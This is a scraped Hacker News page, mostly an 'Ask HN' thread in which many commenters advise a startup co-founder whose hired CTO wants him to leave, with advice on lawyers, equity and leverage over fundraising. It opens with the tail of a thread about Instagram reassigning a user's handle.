So what's next? Facebook employees breaking into houses and stealing Oculus Rift DevKits that haven't been used for a while? SCNR
25
qwerta 1 day ago 0 replies      
Is not there some 'anti hacking' law in US? Aaron S. got like 30 years for downloading a few documents.

Call FBI and see what happens.

26
centizen 1 day ago 0 replies      
Instagram has done this in the past as well, and IIRC; before the merger. But by all means - jump on the Facebook hatewagon and take a ride.
27
Im_Talking 1 day ago 0 replies      
I hate Facebook and, by association, I hate every Facebook subsidiary. They are monetizing your privacy.
28
logfromblammo 1 day ago 0 replies      
I feel as though this would be a good opportunity to remind people that choosing an Internet handle that has any connection to your public identity name is not necessarily a good idea. The potential name space for memorable, usable, easily-typed handles is much larger than the list in the baby names book, and there is value in avoiding collisions.

As my own public name is two of the most common first names and one of the most common last names in the Anglophone world, I am not altogether unfamiliar with the disutility in using a common name.

Aside from that, in the real world, we have a host of disambiguators available to tell the difference between two individuals with similar names. There is no particular reason why a site's user handle would need to be unique. The data store should probably be keying everything on a serial ID number anyway. Just as the DNS exists to associate names with IP numbers, a handle resolver could use disambiguators as needed to minimize disruption of the user experience due to non-uniqueness.

If you log in from a new device with a new IP address, you might be asked "Which 'kathleen' are you?" once, and get a small "I'm a different 'kathleen'" link thereafter. If you're a giant like Facebook, there is probably more utility in allowing people to have short, non-unique user handles with an on-demand disambiguation system than in a system required to enforce user handle uniqueness.

29
geldedus 1 day ago 0 replies      
glad I have deleted my Instagram account back when the policy change scandal; this incident confirms Instagram is a BS site
30
fbndki 1 day ago 0 replies      
Welcome to the nightmare
31
bichiliad 1 day ago 0 replies      
I wonder if this is just really, really clever PR to get people to use their accounts more.
14
Ask HN: CTO wants me to leave
368 points by cantlookaway  5 days ago   272 comments top 122
1
Bluestrike2 4 days ago 10 replies      
You need to hire an attorney, one who works in business litigation (if you can find someone specializing in minority shareholder disputes, that much the better). Right now. If you're delaying on this point out of some idea of wanting to "try to fix things first" or "not wanting to be the bad guy," you're just shooting yourself in the foot and downing blood thinners to keep the wound from clotting. Working with an attorney is not the same as filing suit, and you will never be worse off in this sort of situation for having sought outside counsel. You also need to find your own attorney; the company's counsel works for the company itself, not for any of its investors, executives, or employees.

Judging from your story, your situation is pretty clear: you're being squeezed-out. Sadly, it's not uncommon. Though he might not be asking you to leave right now, framing it as in a few months is just an effort to (i) get some additional benefit out of you, and (ii) give them the time they need to break you.

There are two possibilities right off the bat: (i) the CEO is involved, which is likely given the difficulty involved in squeezing-out a shareholder + 50% co-founder; (ii) the CTO is working alone, hoping to push you out the door and benefit in some way from the resulting vacuum. In either case, you can't move forward without speaking to an attorney. And don't you dare think for one second that you can "just talk to the CEO first."

Already, you're talking about things as an employee rather than an owner. That's your first mistake. An employee might be able to be kicked to the curb, but you're not just an employee. You've already made a significant investment into the company, and from their perspective, an ideal/successful squeeze-out is one that deprives you of that ownership interest entirely. Most of these efforts are successful because they manage to position the person being targeted in a position where they just roll over. Ideally, they force the person being squeezed out to choose to quit rather than actually be fired. It seems like that's the CTO's goal in your situation.

That said, there are few programmers, in my opinion, whose work is so bad that there is zero potential for future improvement. Considering the costs of pushing you out, you'd have to be doing a hell of a lot more than just writing shit code to justify termination. Given that they want to wait until after additional fundraising rounds are completed, I doubt that your involvement with the company is nearly so problematic. Besides, you already stated that there's been a clear improvement in your code.

I was in a similar situation, once. I was foolish, stupid, and trusted a friend I've known for years. I did the development work, partner A brought his business skills and industry contacts to the table along with his money (and a third partner, B, as well). Did the work, but during that time, there was no sight of their money. One of the earliest clues I was going to be screwed was, when discussing fundraising, A mentioned his own deferred pay. Something I thought slightly peculiar given that he was supposed to be investing his own, significant funds along with B. Plus, I don't believe that he actually did any measurable work during the time period that would justify it based on what I knew at the time. Investors are rightly finicky about deferred salaries, and the bar is pretty high to justify them.

When we were at the end, I found myself being squeezed-out: in the end, they apparently figured that it'd be cheaper to outsource to some ridiculous "startup in the box" type of company rather than deal with my deferred pay and the long-term consequences of a third founder's ownership interests) even though doing so would delay things by a couple of months. They even managed to time things well: the weekend of my grandmother's funeral, after A had been told about it, they dropped their little bomb on me. The only good thing was that they walked away without getting a single line of code that I'd written.

My parting was anything but on good terms. Eventually, I wound up not pursuing the matter in court--talking it over with my attorney, it became quite clear that the legal fees of fighting them would be ruinous. That partner C was a shyster of an attorney, and all evidence suggested that they'd just try to wait out the expensive clock rather than consider settling. After all, the cost of doing so would be pretty minimal. Litigation is uncertain and expensive. Painful though it may be, you never ever litigate on principle. Not if you have any brains at all.

Even though I would have likely prevailed given the facts, I would have come up horribly in the red when it was done. A pyrrhic victory and no more. Choosing not to go down that route was one of the harder decisions of my life, made all the more difficult by the knowledge that they had, quite literally, taken even my grandmother's funeral away from me.

Oddly enough, I'm probably better off for it now that I have some distance and perspective to look back. When they launched, it was unobserved and uneventful. Even now, they're unknown with almost no traffic and engagement. They've also made a number of bad mistakes that I had identified--often through trial and error--that I had told them about. It was a submarine rigged for silent running, deep and quiet, that's never bothered to surface for air. All of partner A's vaunted experience and extensive media contacts in the industry proved for naught in the end. Eventually, they'll simply wither and die on the vine. Had they not squeezed me out, no doubt I'd still be hanging on trying to turn things around. After all, who abandons a friend? It was quite the learning experience, albeit an incredibly expensive one.

Luckily, you can avoid that sort of experience by acting now to protect yourself. Document everything, save all of your emails, chat logs, download and archive all Github comments on everything that you've worked on, as well as everything else you can. Make sure that you're also grabbing copies of emails off any servers/accounts they might have access to. Even though it will create problems if there's any litigation, there's a high likelihood that they'll do something foolish such as delete them.

You have a lot going for you right now that'll help you. First, you're obviously still needed to help them raise funds. Second, investors are scared to death of founder disputes. If any potential investors even sniff the possibility, they'll run and never look back while your current investors will raise holy hell, even if the CEO+CTO were able to find some fig leaf of justification. It also implies a deviousness that will scare investors; if they're willing to screw a friend and risk such a serious dispute, then it's also possible that they'll wander into similar situations in the future. Particularly in the early stages, investors and VC firms don't have to put up with that sort of bullshit.

This gives you an absurd amount of leverage: you have the ability to single-handedly kill their fundraising efforts now and in the future. You need to call your attorney and start using it. At the very minimum, it'll put the brakes on any plans they're currently working on. At best, it'll help you move forward as a company without having these sorts of problems lurking about in the shadows.

2
gtCameron 5 days ago 5 replies      
The question I would try and answer if I were in your shoes is the following:

Does he want me to leave the company or does he want me to stop writing production code for the product?

If it's the first one, there is likely a personal issue between the two of you that needs to be resolved one way or another.

If you think the second option is what he is really trying to communicate, then I would look for other opportunities to contribute to the company. It sucks to grasp your own limitations and admit that you might not be a good enough coder to contribute to the product at this point, but this is a critical time for the future of the product. Any technical debt acquired at this phase of development is going to be very costly to pay off later since you are developing the core of the system.

However, you are a founder of the company, and I am assuming very passionate about the company's mission as well as financially motivated to see this thing through. There are tons of jobs that will need to be done as you guys grow, and each one of those is an opportunity for you to contribute above and beyond what a new hire off the street could accomplish. A lot of those jobs can also take advantage of your coding skills to either automate processes or utilize your deeper understanding of how the product works to better support it.

This is of course assuming that you guys have the cash in the bank to pay you for this work, if that is not the case then the situation is a little trickier and you will have to explore other options.

3
9oliYQjP 5 days ago 2 replies      
First off, I'm sorry about your situation. Nobody here will be able to judge with any degree of accuracy whether he has a point. I personally would not look at this situation as a technical one; this is a business relationship situation.

Regardless of whether there is any grain of truth, the CTO has lost confidence in you. Not just a little bit. He has asked you to leave. The rest of my advice assumes the CEO (your co-founder) has quite a bit of confidence in the CTO. If that is the case, I'm not quite sure you can come back from having the CTO asking you to leave, nor am I certain you should.

I think it would be advisable to talk to a lawyer to see how you can cleanly and professionally leave on your own terms. Save the emotional stuff for friends and your alone time. You will no doubt need to grieve (this was your baby). But I think it would be better for you to be proactive about leaving and professionally extract yourself from this situation. That said, make sure you know your rights and what your contracts entitled you to in such a situation.

Once extracted, take your hurt pride and prove them wrong.

4
hoodoof 5 days ago 2 replies      
Listen Eduardo Saverin:

FIRST THING GET YOUR OWN LAWYER AND TALK TO THEM NOW!

The key question here is: do you have equity, and how much equity do you have in percentage terms?

If you are an equal cofounder, then when someone turns up and says "you have to leave cause better people have been employed", you say "fuck off". Think about it - EVERY company that grows will employ people who are better than the cofounders in some way, that is the whole point. You are the FOUNDER, you brought value to the company early. Just because smarter or more experienced people have been employed in no way devalues what you did in the early stages. In fact this is PRECISELY what is meant to happen. Do you think that Zuckerberg is the best developer at Facebook - legend may say so but it's not true - can't be. So should Zuck be fired cause he's not their strongest tech guy?

You also need to think separately about your rights as employee and rights as a shareholder/owner - they are not the same thing. You DO have clear contracts as both employee and shareholder DON'T YOU? Those contracts specify (or should specify) your rights.

And who the fuck does this guy think he is that he can tell a cofounder to leave? You are his BOSS.

DO NOT LEAVE. And if you do leave, DO NOT SELL YOUR SHARES IN THE COMPANY - just say "I want a MASSIVE payout to accept being fired, and I WILL NOT sell my shares as part of settlement". Hang on to those shares because now these guys are going to do all the hard work in growing the company and you can chill out and do other things and when they IPO, you'll take home your share. And if this is the path you take, look out cause some time in the future they will try to play a legal game in which you hang on to your shares but they get diluted down to almost nothing. This cannot happen if you are careful to look out for it.

This is all on the assumption that you do have equity and contracts in place. If you don't, then you should go and watch "The Social Network" repeatedly until you learn your lesson.

5
carbocation 5 days ago 1 reply      
You have phrased this as an almost apologetic post, focusing on your ability to write code. An analogy to medicine might be worrying about your ability to take a good history and physical exam, but in the meanwhile the patient is bleeding in front of you.

The problem is not your ability to write code - the CTO even admits as much when he says he needs you now but wants to replace you later. Your code is desperately needed. But I don't really care about this.

Assuming a normal situation, the company is yours and your co-founder's (by ownership), and the CTO likely has a small amount of equity (relative to yours). In an early stage company that hasn't yet raised money, your company is basically an extension of yourself. You don't have responsibilities to shareholders or employees because you don't have either yet. You have a responsibility to yourself and your vision. The CTO did not found the company and that alone tells you that you have some amount of vision, ability, or ability to take advantage of chance that he did not have.

If you want to remain involved in the company, and it seems that you do and should, then you need to clarify for the CTO where the boundaries of his responsibilities lie. His job is not to ask you to quit, and he may be beyond the point where you can continue working with him (or not - I don't know enough detail). But if he is to continue working for you (and do recall that he works for you at your pleasure), he needs to focus on solutions that don't involve him trying to fire you.

Most founders don't end up coding very much after their companies grow, and the CTO may be hopeful to get more experienced programmers working for the company. But there are about 10,000 miles in between "we should hire people with deep experience in X" and "I want you to leave the company." The latter is a political gambit that needs to be dealt with after careful consideration in a way that shows teeth.

6
avenger123 5 days ago 2 replies      
It looks like you have real equity in the company and there is possible traction in the business.

You are a co-founder. That counts for a lot. I am also assuming that your equity stake is significant.

First of all, deal with this right now. Don't wait for the 3-6 months. You are basically being told that once they have raised money, they will find a way to get you out. Right now, it's a fishing expedition between the CTO and the other founder. Will you be a nice gentle person and go along with their approach or are you going to turn into an attack dog.

You likely have tremendous leverage right now due to this funding round coming up. They will not want to rock the boat. But this is exactly when you should be doing it as I don't believe the "we need you" bit means anything other than "we don't want you to fk up our funding round coming up".

At the end of the day, if they really want you out, they'll find a way to do so. The main thing is that you got to get on the offensive and make sure if you do end up leaving the company, you've left on the best financial terms possible for yourself. Make them pay. In fact, throw out a number you are comfortable with and have them pay you out from that in the next funding round.

If you approach this as "what's best for the company", you have already lost because that's not what this CTO and your other founder are approaching this from.

EDIT: You should provide some more detail on the equity position you have and how formalized it is (ie. proper contracts). Being a co-founder isn't about just writing code. As others have said, if you have significant equity, you have a lot of power. Don't underestimate this.

7
icambron 4 days ago 3 replies      
Leave. Seriously, walk away. Here are some thoughts:

1. The situation is poisoned. If you stay and force a battle of wills, it will be hugely distracting in a way that adds no value to the company (and remember, building a great company is why you did this in the first place), not to mention personally painful for you. That the CEO and CTO have lost confidence in you means it's just going to suck from here on out. Even if you win, that just means disempowering the CTO (or replacement CTO if the current one leaves in frustration, which doesn't seem improbable). Maybe the CTO is wrong, but if he's saddled with someone he doesn't want and can't get rid of because of special cofounder status, it's going to create a pretty shitty working environment for everyone. And if he wins (say, because the CEO votes you out), then that's the same as you sliding out anyway.

2. The CTO definitely hasn't overstepped his boundaries; he's doing his job. He's responsible for running the engineering team and delivering a product. If he thinks you're holding the company back, he'd be being irresponsible not to do something about it. Of course, he could be wrong and there's no way for me (or anyone else here) to determine that. So you have to ask yourself what you really think is best for the company. If it's you leaving, tanking the company in a huge fight (or just dragging it down by sticking around) will just destroy whatever equity you have in it. If it's you staying and you're confident (after putting aside your ego, considering it from other people's views, etc), then yeah, convince the CEO and then together fire the CTO for being so terribly wrong. But it's not an issue of boundaries. So: would you hire you?

3. Closely related: what are you doing cofounding companies with that little confidence in yourself? If someone came to you and said, "hey, I haven't coded much and don't have a lot of experience", would you think that was a wise investment? Because you went all in on that investment. Do some work with some guidance and lower stakes and learn your craft. I don't at all mean that as "noob go home" (I have no idea how good you actually are); I mean that your description basically acknowledges you don't think you're the right person for the job of technical cofounder.

4. Your CEO sounds clueless and you should take this opportunity to bail out. If the CTO is wrong about you, the CEO's confidence in him is misplaced and he's also allowing unnecessary complications to destroy his engineering team. If the CTO is right that you don't even belong on the team, then why did the CEO partner with you in the first place? Maybe he thought of you as a temporary pawn to be sacrificed at the right time. Maybe he just doesn't know what he's doing. None of those are good. Get out.

5. You say in one of the comments that you don't want to lose your unvested shares and that you've taken on a lot of opportunity cost. The whole point of the vesting is that you get what you've worked for. If you don't think the vested equity you have is commensurate with the work you've done, working more isn't going to fix that. You'll just continue getting screwed, putting in more time and earning the same vesting that you're unhappy with. I know you probably feel pot-committed, but the best thing to do when you have a bad hand is fold your cards and move on.

6. Startups are hard. They're painful work, especially when things go bad, to the point that I wonder why we do it in the best of situations. If you throw in the stress of trying to prove you even belong, it's just shitty. Save your happiness and leave.

7. It's important not to think of these decisions as an affront to your pride. The never-say-die bromide of startup cofounders the world over is mostly bullshit. Make sure you're in a healthy situation with a real chance of success. Quitting isn't shameful, but sabotaging your happiness and the value of your investment because it hurts your ego is very unwise. I don't know whether or not I'd be wise in that situation either--I certainly have plenty of ego--but of course that's why you asked us: we're not involved.

My guess is that once you leave, clear your head, and figure out what you want to do next, you'll look back and say, "wow, I'm glad I got out of that."

8
anigbrowl 5 days ago 3 replies      
He's trying to fuck you over. Remind him that he works for you, not the other way around. Start looking for his replacement. Check with a lawyer about the security of your own stake and make sure you are good with the business guy, because the CTO has probably been whispering poison in his ear about you.

9
jw2013 5 days ago 3 replies      
> My question is, does he have a point?

No. He is making the wrong assumption here "that he wouldn't hire me if I wasn't already a founder and not what the company needs". First, you ARE a founder - I genuinely do not believe you can't learn the knowledge you need given how motivated you are. And you are learning. Second, he already admitted you are what the company needs (at least during these 3-6 months), so why is he BSing you to leave? His mindset is so wrong for the startup world, just assuming things will take off and by then you are not needed anymore. You are desperately needed now; that makes you valuable. Your company probably can't make it to the next milestone in 3-6 months without you, at least it will take longer to hit milestones without you. You are valuable, and you feel for the company, just tell him that.

> Is this something that is common?

Yes, but not quite often at this early stage of a startup. I smell some politics of him. Do you two get along well besides tech issues in the company? Since he knows you are still desperately needed now, and he is still making BS about advising you to leave, I can only conclude he probably does not like you (not just in tech realms), and he clearly does not care about the success of the company as much as I do (the company still needs you to be successful at least at this stage of growth).

> Has he overstepped the boundaries?

First things first, just learn the things you need to know fast. You will know when you are making great contributions to the company, and you want that. Don't let your CTO stop you from that. At least when you are working, don't think about the issue with him and grow fast as a coder. I suggest a conversation with him off the work time. If I were you, I would like to know if he had issues with me beyond his doubt in my tech ability.

> It is in my interest however to remain in the company because my equity is vested, the sooner I leave the less I will get in return, apart from my time, and opportunity cost I invested all my personal wealth.

Did you have a cliff in your equity vesting? If so, have you passed the cliff period? I really don't recommend you leave before all your cliff equity is vested, otherwise you will get next to nothing. Manage to stay with your company at least through the cliff period. Your company wouldn't have made it this far without you, your company owes you that, and you know through what it should pay you off? Equity. So just manage to get the credit where credit is due.

---

May the best luck be with you.

10
jonsterling 5 days ago 1 reply      
I don't know anything about business or founding a startup: but as an engineer in one, if you have hired a CTO who is better at engineering than you (kudos!) and he/she has asked you to stop writing production code, you should listen. Coding "for old times' sake" is pretty damaging when a team of actually trained engineers has just got your old broken code-base under control and instituted better engineering practices. This is part of the typical startup lifecycle: the code that got you here isn't going to get you to the next place, and it's your job to find, hire and enable better engineers to get you to the next level.

But if he actually is asking you to leave the company? He can fuck himself. But seriously, if it is clear that you are hurting more than helping by writing code, please stop. Keep learning, and ease into contributing again slowly.

11
geuis 5 days ago 1 reply      
This is your company, not the CTO's. It's time to fire him.

The ability to code really doesn't have much to do in the long run to the company success. Of the two founders at the company I work for, both could code but one hasn't in a long time and the other only does on occasion. As the team has grown, their responsibilities have shifted. Yours will too.

12
throwa 4 days ago 0 replies      
Honestly, you need to get some self confidence. You need to man up. Being a nice guy in this scenario doesn't help. If the CTO wants to play dirty and ruthless, you must play dirty and ruthless. How did a guy you hired get the guts to tell you he wants to fire you as a co-founder? This means your other co-founder is probably ganging up with him behind your back. You cannot trust both of them. I don't know who owns more percentage of the company between you and your co-founder but I want to believe that your CTO is a minority stakeholder at this point. Don't leave without a thorough fight. The good thing is that you can code no-matter how terrible, you can build a minimum viable product for any future idea you have. Your CEO cannot which is why it is convenient for him to try and co-operate with the CTO.

Line of action:

1. Start speaking to a lawyer.

2. Transition out of code writing role into product visionary role, so the CTO doesn't see you as someone that reports to him. You played a part in not just formulating the initial idea but in coding a prototype, so in essence you can play the role of product visionary. That is Chief Product Officer.

3. Tell your co-founder you are transitioning into a product visionary role with the title of Chief Product Officer. Read up what this role does.

4. Call for a meeting with just you and your co-founder and test his allegiance. Tell him that if a guy you hired wants to fire you then he can also team up with future investors to fire the CEO, so he is not safe in the future. So due to trust issues, you intend to fire your CTO after you get a replacement. Show him a list of possible top people in the open-source world using your technology that you intend to open up communication with as possible replacement for the CTO. Sink it into his head that the CTO is replace-able and that culture fit matters more than skills as you can get a replacement for skillset easier than getting the person with the right skillset and cultural fit. http://www.bhorowitz.com/programming_your_culture

5. Call a meeting with your CTO and tell him you plan to stop writing code and then tell him you also plan to get a new CTO to replace him because you can't have a guy you hired steal your company. Let him know he is also replace-able as you wouldn't have hired him because of poor culture fit even though he is skillful if you knew about the schemer he is.

6. Now that you have manned up to both, call a meeting with the CEO and CTO to address any issues relating to what you discussed with them.

7. Watch the shares during any round of funding, so you are not squeezed out. See the company incorporation details and ensure your name is there and you are not deceived by your other co-founder.

8. CTOs are replace-able, don't let someone you hired ask you to leave, so that he can take your shares. He probably overstated his importance behind your back to the CEO and asked for more shares and your co-founder felt that if he gets you out of the way he will get more shares.

If they were bold and ruthless, you must be bold and ruthless too.

State your importance to founding the company, idea generation, writing enough code to make the CTO join, since he knew you people were not idea only guys.

Kick that CTO out and henceforth watch your co-founder closely.

13
thejosh 5 days ago 0 replies      
"EDIT: He's not asking me to leave now, since I'm still desperately needed, but in 3-6 months time after we have raised more funding."

Means they do actually need you, the CTO is waiting for a payday before kicking you out for a higher stake. Tell the CTO to go stick it if they need you before funding but not after.

14
nashequilibrium 5 days ago 0 replies      
I really don't understand this story, most tech entrepreneurs with successful companies have to hire people better than them, Mark Zuckerberg, Jack Dorsey (especially the Twitter guys), Snapchat etc. You 2 guys are the founders and hired a CTO and the CTO is telling you to leave, imagine the CTO of Snapchat telling Evan Spiegel who cannot code to leave, it just doesn't add up.

If I had to guess, your cofounder who is the business guy realizes that the CTO is a better coder than you and is trying to push you out and offer the CTO a better share of the company. You really need to stand up for yourself, do not limit yourself or feel inferior, I mean even Larry and Sergey had to get better programmers than them.

15
gojomo 5 days ago 0 replies      
That's tough. Your last edit gives me the most pause: if you're good enough to be "desperately needed" for this critical pre-funding period, you should be good enough for after, too.

Don't sell yourself short: simply knowing your limits is a major skill, that will let you contribute where you can, grow where you can, and defer to others where you must. Also, having been involved since the start gives knowledge and perspective that can't necessarily be hired elsewhere.

Ultimately if you want to stay -- and especially if you still have the support of your biz cofounder -- you should insist on having the chance to grow with the company, learning as you go along. And the plan for the future needs to be well understood among the principals, before the fundraising, because that process will tend to firm up roles, equity, vesting, employment agreements, etc.

It's true that sometimes a member of the founding team isn't right: the commitment or skills or shared-vision isn't there, and perhaps the original title/status/equity even gets in the way of acquiring what's needed. But it sounds like you're humble and flexible enough that you should be able to retain a key role.

If you are considering leaving from, or think you might be pushed out of, a valuable position, you will likely want to consult with a lawyer, separate from the company lawyer, about how to best protect your rights. (The fundraising process itself, and getting the whole company/team into "standard" documents, could either work to your advantage, or make it very easy for you to be booted with very little, so educate yourself early, to avoid signing away anything valuable.)

If intimidated by the idea of talking to a lawyer, remember that many will give a free 30-60 minute initial consultation, so simply by the act of shopping around, always improving your 'executive summary' of your situation before each discussion, you'll learn a ton at no cost. (No two lawyers will have the exact same analysis, so the 5th or 10th you talk to may still improve your understanding.) And if you find someone you like, they may give you quite a bit of continuing good advice simply in return for the future-chance/option-value of representing you in a future dispute.

16
balls187 5 days ago 0 replies      
This is your company. Not the CTO's.

It's time to have a frank discussion with your co-founder and decide what is best for you and for the company.

It may ultimately be best for you to step down, but it shouldn't ever be because of your technical abilities, and it shouldn't be because the CTO believes you should.

There are lots of things you can be doing, and the fact that you CAN code (even if it's not high level) is huge.

There is testing, blogging, social networking posts, Google Analytics, SEO/SEM, recruiting, buying office supplies, soda runs, customer outreach, marketing, more testing, design, investor outreach, product management, program management.

You have so much that you can do, that unless you are a liability (past convictions by the SEC), or so caustic that you are the direct cause for the company's failures, that you still have an important role at your company for many years to come.

And if you do stay, it's time to put the CTO on notice, the CTO works for you.

17
hansy 5 days ago 0 replies      
Provided you're not writing anything that detrimentally impacts the product, there's no reason for you to leave. It's your company.

Now I say this not so you can sit back and let others do the hard work, but for you to figure out how else you can contribute. Every startup, hell every mature company, has issues to deal with on a daily basis. I would be very surprised if there wasn't something else you could be doing for the company.

Worst comes to worst, your job from here on out is to do the tasks nobody else wants to do. From a technical perspective that could mean things like sanitizing the database (if it needs it) or going back and writing some good tests for already-implemented code. From a business perspective, this could mean researching, scraping, generating leads to customers, users, etc. Hell, you can even be the glorified secretary by helping others manage their day-to-day tasks, schedules, appointments. Be the office janitor. Be the guy they send to campus events to talk to students.

If you can no longer contribute to the code for your product, that's OK. There's a million and one things you can do outside that realm to support the product as well as your teammates.

Of course you can always buckle down on your coding game and get better at it. Take online courses. If you (and your company) can afford the time and money, go to one of those schools that teach you to be a better programmer. Tell your CTO that you want to get better and want to learn from him/her.

Be the glue that holds everyone together. Be the swing man that can bounce from activity to activity and ensure everything is running smoothly. Be the founder who's relentlessly resourceful and continues to move the company forward in any shape or form.

18
WoodenChair 5 days ago 0 replies      
Let's assume that what the CTO says is true: you're not a good enough coder that you're any longer needed on a day-to-day basis in a few months. You're still a cofounder and I assume owner of quite a bit of equity of this company. Can't you talk to your other co-founder and find a different role for you on a day to day basis so that your stock still vests?

Or is this all about money/power? Is the new CTO threatened by you for some reason or trying to consolidate his power? Does the new CTO just not like you?

If you and your other co-founder are even remotely close, you guys need to talk. Sit down and figure out what other roles work for you at the company. Perhaps you will need to move out of management and become something like a "developer evangelist" or "head of support". Anything to keep vesting, right?

19
marknutter 5 days ago 0 replies      
Uh, you are a founder. Nobody asks you to leave. You took part of the risk to start the company, the new CTO did not. He does not get to tell you to leave. Ever. Period. I'm actually shocked that you're even considering it.

20
dvirsky 4 days ago 0 replies      
I was once offered the job like this CTO, taking over from a less experienced co-founder, with his consent, while he remains in place. I didn't take the job for other reasons, but I would never have done what this guy is doing to you. And if I had, the CEO would probably fire me.

If you were really that bad, your co-founder CEO should have parted ways with you already. But of course you're not - just the fact that you are aware of your limitations and learning as you go, is evidence of that. I've seen bad technical co-founders, and they are NOT aware of their limitations usually, or don't care about it. And BTW for the quick-n-dirty prototype part of a start-up's life cycle, having crap code is perfectly fine IMHO - as long as you're aware of it and it's a conscious decision.

But if that really is the case (and I doubt it) - and it's for the greater good of the company that you will be fired - you should be very well compensated for your time and effort, as others have mentioned. I've actually seen another situation at a start-up where this was in fact the case, and the company was better off firing a co-founder. It was painful but he was compensated and got to keep most of his shares, so it was probably in his interest as well (though I'm not sure he realized it at the time).

21
headhuntermdk 5 days ago 0 replies      
It's your company.. If your CTO is approaching you like that, send him packing with a pink slip. Do not pass go, do not collect $200.

There is a hell of a lot more to building a company than just code and if he can talk to you any way he wants to without any consequences, then you have truly lost.

As others have said, you are supposed to hire people better than you, but that doesn't mean you have to take shit from them either.

Bottom line is don't be a doormat and be prepared to put "boot to ass" if necessary.

Good luck

22
the_cat_kittles 5 days ago 1 reply      
It is REALLY stupid to tell someone you want them to leave in 3 months. Why not wait until three months have gone by? My totally uninformed guess is there is some kind of long game / ego thing at play besides just actual ability to contribute. Don't feel ashamed that you aren't the alpha tech. If you are trying your hardest, and especially as a cofounder, you would be more than welcome at any company I have ever worked at.

23
Paddywack 4 days ago 1 reply      
I had something like this happen to me (on a larger scale) - I folded, and regretted it for years.

Firstly - go straight to see a lawyer. Do not consider anything else before you have done this. Play hard, don't blink!

Secondly. If things don't go your way, play the long game and take your time. Make sure that they know that this will not be resolved quickly, and that having this hanging over them will frustrate their attempts to raise capital.

Behind the scenes this is what I think is going on:

1) The CTO is more experienced, and thinks he is entitled to more than you as a result (you seem to agree that you are relatively inexperienced). He cares little about loyalty and honour as he was not there to see you slogging it out in the early days.

2) What you have set up must be worthwhile and be starting to get valuable, otherwise you would not have attracted a "good" CTO.

3) My thoughts are this is part of the play to attract equity:

- They probably don't want to dilute too much, so would love to grab your shares back before the deal so that they can neaten things out for the new investor

- They probably want the new deal to include shares for the CTO. He is probably niggling for this, and the CEO would prefer to take yours than dilute his.

- They want to put forward a team that has the most value for fund raising. They want solid credentials, and probably feel that yours don't fit the bill.

Good luck hey!

24
wisty 4 days ago 0 replies      
You'd make a better CTO than him. I'd rather work for a CTO who listens to good advice than one who is really sharp, but fucks people over.

Obviously, you are fairly technically competent (or he wouldn't need you around, and you wouldn't have gotten the prototype working). You're also a competent leader - you are listening to technical advice.

But let's say you hire a few more good coders. The CTO feels threatened. Is he going to listen to them when they challenge him, and possibly even step aside if one of them would be a better CTO, or is he going to fuck them over the same way he's fucking you over?

He sounds like a toxic political player. You can think "He's a snake, but he's our snake. His political skills will give us an edge", but it rarely works that way.

If you can, get rid of him, promote yourself to COO, and make the other good programmer CTO or lead programmer or something.

25
benologist 5 days ago 0 replies      
Tell him if he'd like a different boss he should work for a different company. It's your company, he's your employee, and he shouldn't have taken the job if he didn't want to work with and for you, and he's not the right person for the job if he can't.

26
DigitalSea 4 days ago 0 replies      
Maybe he is telling you the truth, but you are a founder, he is a CTO. Maybe it is just a simple case if you are currently contributing code to the idea to step back and let this other guy handle the coding aspect for you. Maybe you can better spend your time as a co-founder elsewhere in your company.

Having said that, if he is forcefully advising you to leave, he is overstepping his boundaries and you need to contain that fire now before he starts turning other employees against you. A toxic employee in a company is like a cancer, it will start in one area and if not treated, it will spread throughout every orifice in your body until it kills you.

If it is a simple matter of you're making it hard for the CTO to do his job because you're committing code and continually breaking things, maybe you need to step back and let him do his job. He can't force you out of your own company, but he might have enough collateral (if he is truly instrumental in your company's success) to get other people to listen to him and force them to make a decision. The CTO is either brutally honest, he's an asshole or he's gunning for your spot in the company.

I would be looking at this from all angles. Don't just assume the CTO is acting alone, for all you know the CEO or your business partner is instrumental in his push for you to leave. You're not just an employee, you're a co-founder and you have rights and responsibilities. You're acting like the CTO has already won which will be your downfall. Exercise your rights as a co-founder to fix this.

I would seriously fire the CTO. He might have been instrumental in the company's success, but he has overstepped the line. He has gone beyond the point of merely telling someone they're making his job hard, he's asking a co-founder to leave. It's like some manager at Microsoft asking the CEO to step-down, it's just crazy.

Get legal advice ASAP. Explore your options, but without-a-doubt, get legal counsel right away before you do anything else. My first question to your lawyer would be: Can I fire the CTO cleanly without recourse?

27
linohh 5 days ago 0 replies      
A good CTO would help you improve. I know it's stupid to make assumptions, but I'd assume he's trying to manipulate himself into higher equity in an early stage. Telling someone that he's about to be let go is poison motivation-wise. He may be trying to reduce your performance so he can use your declined output against you.

28
zaidf 5 days ago 0 replies      
The CTO can ask you to improve your coding or to stop coding, after all he was retained to make those calls. But he cannot ask you to leave the company if you are a proper cofounder. The only person who is in any position to make a request like that is your cofounder or your Board.

29
throawaycofnder 4 days ago 1 reply      
Throwaway here.

I too (like Bluestrike2) was squeezed out of the company I co-founded. I know what it's like. And I want to help.

In my situation, I didn't get 3-6 months notice.

There was a "difference of opinion" about the value of work I was putting into the business, and a "difference of opinion" about where the business should go strategically, and one Tuesday morning I entered a grim meeting where I was given an exit contract to consider.

It was a bit of a shock - and they kindly offered me a few days to think about it, letting me go home to cry.

How very kind of them...

...I realised the next day that it was to get me out of the building without incident - and that they'd already begun changing passwords (including my work email password) in the meeting, and continued the rest of the day.

How humiliating

The situation you're in sucks.

For what it's worth (and I say this sincerely), I'm so fucking sorry.

They're assholes. You don't deserve this. And the company never would have got to where it is today without your contribution - and how dare they use the foundation you built (your baby) to screw you.

Then they have the gall to act as if you're "not good enough".

Fuck them.

You're awesome. You've done some cool shit. And - as great as the project is you're working on now - I would sincerely hope that it wasn't going to be the crowning achievement of your lifetime. I'm absolutely certain that the best for you is yet to come.

I could tell you how good things are going to be in the future, and you probably wouldn't believe me.

I could tell you that the lessons you learn now about control, shareholdership, business politics and more will save you later when friends and colleagues are learning the lessons themselves.

But both of these are cold comfort.

Realistically things are going to get harder for a while (finances, life direction, self confidence, etc), but in a few years as these things get back on track you'll know yourself better, be doing something you love more, and will be much wiser as a result of what you're doing right now.

Now... Let's focus on the next few weeks.

Firstly, ignore the posturing and politics in this thread about whether or not the CTO overstepped his bounds. Realistically, if he has the CEO on-side, it doesn't matter.

Feel free to get up on your high horse about this if you need to, or if it makes you feel better. Or you could wear funny hats. Or do something else equally useless.

When you're ready to do something productive, let's keep going.

30
cmapes 4 days ago 0 replies      
The biggest question is what was your and your co-founders' legal agreement in the bylaws/operating agreements regarding equity given in exchange for assigning your IP (earlier code hackery) to the entity?

